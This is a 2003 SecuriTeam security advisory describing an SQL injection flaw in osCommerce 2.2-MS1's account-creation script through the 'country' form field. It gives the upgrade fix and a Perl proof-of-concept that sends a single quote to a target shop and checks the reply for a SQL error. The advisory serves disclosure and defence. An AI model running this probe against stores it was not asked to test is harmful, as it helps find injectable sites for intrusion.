[UNIX] osCommerce SQL Injection Vulnerability (create_account_process.php)

• Previous message: SecuriTeam: "[NT] DameWare Mini Remote Control Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Dec 2003 17:03:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  osCommerce SQL Injection Vulnerability (create_account_process.php)
------------------------------------------------------------------------

SUMMARY

" <http://www.oscommerce.com> osCommerce is an online shop e-commerce
solution under on going development by the open source community. Its
feature packed out-of-the-box installation allows store owners to setup,
run, and maintain their online stores with minimum effort and with
absolutely no costs or license fees involved". An SQL injection
vulnerability in the product allows remote attackers to gain elevated
privileges.

DETAILS

Vulnerable Systems:
 * osCommerce version 2.2-MS1, possibly older versions.

Immune Systems:
 * osCommerce version 2.2-MS2

osCommerce is vulnerable to SQL Injection vulnerability in the
create_account_process.php file. The attack can be carried out by a
malicious user who is registering an account. All one has to do to exploit
the vulnerability is save the registration form offline. After doing so an
attacker can edit the "country" field to include malicious SQL code.

Solution:
Upgrade to the latest release available at:
<http://www.oscommerce.com/downloads> http://www.oscommerce.com/downloads

Exploit:
#!/usr/bin/perl
####################################################################
# osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [ http://www.gulftech.org
]
####################################################################

use LWP::UserAgent;

####################################################################
# Use this script to test if your shop is vulnerable. Results are obvious
:)
####################################################################

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0" . $ua->agent);

if (!$ARGV[0]) {
  &usage;
}
 
$host=$ARGV[0];

print "Trying $host ....\n";

my $req = new HTTP::Request POST =>
"http://$host/create_account_process.php";
   $req->content_type('application/x-www-form-urlencoded');
   $req->content("action=process&country=%27");
my $res = $ua->request($req);
$pattern = "You have an error in your SQL syntax";
$_ = $res->content;

print "\n" x 3;

if (/$pattern/) {
print "Host Is Vulnerable!\n";
print "Download The Latest osCommerce ...\n";
print "http://www.oscommerce.com/downloads\n";
} else {
print "Host NOT Vulnerable\n";
}

print "\n" x 3;

exit;

sub usage {

print "osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [
http://www.gulftech.org ]\n";
print
"--------------------------------------------------------------------------\n";
print "perl ossqlin.pl \"path to shop\" ex: ossqlin.pl
www.mywebstore.com/catalog\n";

exit;

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:security at gulftech.org>
JeiAr

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] DameWare Mini Remote Control Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]